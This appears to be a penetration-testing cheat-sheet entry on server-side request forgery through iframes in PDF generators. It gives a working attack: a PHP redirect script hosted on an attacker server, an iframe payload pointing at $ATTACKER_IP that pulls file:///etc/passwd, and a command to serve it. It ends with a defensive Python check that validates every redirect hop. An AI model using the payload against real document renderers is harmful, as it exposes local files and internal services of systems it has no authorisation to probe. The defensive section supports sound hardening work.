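# SSRF through iframe

* [Taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
* Upload an iframe that points at an attacker-controlled server hosting the PHP script below. The script answers with a redirect to a local file on the target server; the redirect target comes from the `a` parameter and defaults to `http://127.0.0.1/`.

```php
<?php
// Default redirect target when no "a" parameter is supplied
$loc = "http://127.0.0.1/";
if (isset($_GET['a'])) {
    // Redirect target chosen by the request, e.g. a file:// URL
    $loc = $_GET['a'];
}
// Answer with a redirect; the component rendering the iframe follows it
header('Location: ' . $loc);
?>
```

* The payload looks like this:

```html
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
```

* Start an ad hoc PHP server to serve the script:

```bash
php -S 0.0.0.0:4711
```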
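The defensive counterpart, as an added example that is not part of the original notes or the linked post: because the iframe URL itself is a plain `http://` address and only the redirect switches to `file://` or loopback, a renderer has to validate every hop, not just the first URL. The names `hop_allowed`, `check_chain`, `SAMPLE_DNS` and the host `attacker.example` are hypothetical, and the DNS table is constructed so the code runs offline.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Constructed DNS table so the example runs offline (hypothetical host name).
SAMPLE_DNS = {"attacker.example": ["203.0.113.10"]}

def resolve(host):
    """IP literals resolve to themselves; names come from SAMPLE_DNS."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return SAMPLE_DNS.get(host, [])

def hop_allowed(url):
    """Return (ok, reason) for one URL the renderer is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    addrs = resolve(parts.hostname or "")
    if not addrs:
        return False, "host does not resolve"  # fail closed
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped  # treat ::ffff:127.0.0.1 as 127.0.0.1
        if any(ip in net for net in INTERNAL_NETS):
            return False, f"internal address {ip}"
    return True, "ok"

def check_chain(start_url, locations):
    """Validate the start URL and every Location header that follows it."""
    url = start_url
    for loc in [None, *locations]:
        if loc is not None:
            url = urljoin(url, loc)  # a Location header may be relative
        ok, reason = hop_allowed(url)
        if not ok:
            return False, url, reason
    return True, url, "ok"
```

In a real renderer the same check has to run against the address actually connected to for each request, otherwise a DNS answer that changes between check and fetch bypasses it.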